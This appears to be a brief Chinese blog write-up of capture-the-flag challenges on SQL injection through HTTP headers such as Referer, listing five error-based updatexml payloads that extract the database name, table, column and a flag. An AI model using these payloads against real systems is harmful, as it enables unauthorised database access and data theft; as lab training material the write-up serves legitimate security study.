header二

第二题就是在referer添加SQL语句进行注入和上一题步骤一样

第三题

再用上面那个方法就行不通了,多加了一层过滤

1'and updatexml(1,"1",1),'1') -- 1

1'and updatexml(1,concat("1",(select database())),1),'1') -- 1

1'and updatexml(1,concat("1",(select table_name from information_schema.tables where table_schema='head_error' limit 0,1)),1),'1') -- 1

1'and updatexml(1,concat("1",(select column_name from information_schema.columns where table_schema='head_error' and table_name='flag_head' limit 0,1)),1),'1') -- 1

1'and updatexml(1,concat("1",(select flag_h1 from flag_head limit 0,1)),1),'1') -- 1

相关推荐

  1. <span style='color:red;'>header</span><span style='color:red;'>二</span>

    header

    2023-12-06 03:34:02      56 阅读
  2. HTTP Header Fields

    2023-12-06 03:34:02       40 阅读
  3. 【http】常见http headers

    2023-12-06 03:34:02       37 阅读
  4. Nginx: proxy_set_header 与 add_header 区别

    2023-12-06 03:34:02       42 阅读
  5. header中的User-agent

    2023-12-06 03:34:02       53 阅读
  6. 开发安全之:Header Manipulation

    2023-12-06 03:34:02       51 阅读
  7. buildadmin中header的导入功能

    2023-12-06 03:34:02       51 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-06 03:34:02       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-06 03:34:02       106 阅读
  3. 在Django里面运行非项目文件

    2023-12-06 03:34:02       87 阅读
  4. Python语言-面向对象

    2023-12-06 03:34:02       96 阅读

热门阅读

  1. LeetCode //C - 72. Edit Distance

    2023-12-06 03:34:02       59 阅读
  2. 鼠标移入移出事件

    2023-12-06 03:34:02       58 阅读
  3. Gson与FastJson详解

    2023-12-06 03:34:02       54 阅读
  4. qt 5.15.2 网络文件下载功能

    2023-12-06 03:34:02       58 阅读
  5. 卷积神经网络训练情感分析

    2023-12-06 03:34:02       58 阅读
  6. 11-鸿蒙4.0学习之页面之间的参数传递

    2023-12-06 03:34:02       49 阅读
  7. RabbitMQ之ttl(过期消息)解读

    2023-12-06 03:34:02       58 阅读